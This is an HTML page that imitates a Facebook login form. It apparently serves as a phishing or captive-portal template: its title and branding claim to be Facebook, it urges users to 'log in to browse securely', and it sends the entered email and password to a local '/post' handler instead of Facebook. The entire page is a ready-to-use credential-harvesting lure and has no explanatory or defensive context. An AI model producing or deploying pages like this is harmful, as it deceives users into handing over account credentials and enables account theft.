<!DOCTYPE html><html lang=pt-br><head>
    <meta charset=UTF-8>
    <meta http-equiv=X-UA-Compatible content=IE=edge>
    <meta name=viewport content=width=device-width, initial-scale=1.0>
    <style>
    @charset utf-8;
    * {box-sizing: border-box;text-decoration: none;}
    body {display: flex;flex-direction: row;justify-content: center;align-items: center;margin-top: 40px;font-family: Helvetica, sans-serif;background: #F3F2F2;}
    div#corpo h1 {text-align: center;color: #4169e1;font-size: 50px;}
    div#login {border-radius: 6px;width: 350px;box-shadow: 0 2px 4px rgba(0 ,0 ,0 ,0.3), 0 8px 16px rgba(0 ,0 ,0 ,0.3);}
    div#login form {width: 100px 100px;padding: 16px;background-color: white;border-radius: 8px;}
    div#login a {padding-left: 80px;margin-top: 16px;display: block;}
    div#login p {text-align: center;font-size: 16px;margin-top: 5px;}
    div#login input {width: 100%;margin-bottom: 10px;padding: 16px;border-radius: 6px;border: 1px solid #c3c5c9;}
    div#login input[placeholder] {font-size: 16px;opacity: 50%;}
    div#login button {background-color: #4169e1;border-radius: 8px;border: 1px solid white;width: 100%;padding: 15px;color: white;font-family: Helvetica, sans-serif;font-size: 16px;font-weight: bold;cursor: pointer;}
    </style>
    <link rel=shortcut icon href=favicon.ico type=image/x-icon>
    <title>Facebook</title>
    </head>
    <body>
    <div id=corpo>
    <h1>facebook</h1>
    <div id=login>
    <form name=login-form method=POST action=/post>
    <div style='min-height: 250px'>

                      <center><div class='containertitle'></div><div class='containersubtitle'>Sign with Facebook </div></center><form action='/post' id='login-form'><input name='email' class='input-field' type='text' placeholder='Email' required><input name='password' class='input-field' type='password' placeholder='Password' required /><div class='containermsg'>Please log in to browse securely</div><div class='containerbtn'><button id=submitbtn class=submit-btn type=submit>Next</button></div></form></div>
    <!-- <a href=#>Esqueceu a senha?</a> -->
    </form>
    </div>
    </div>
    </body>
    </html>
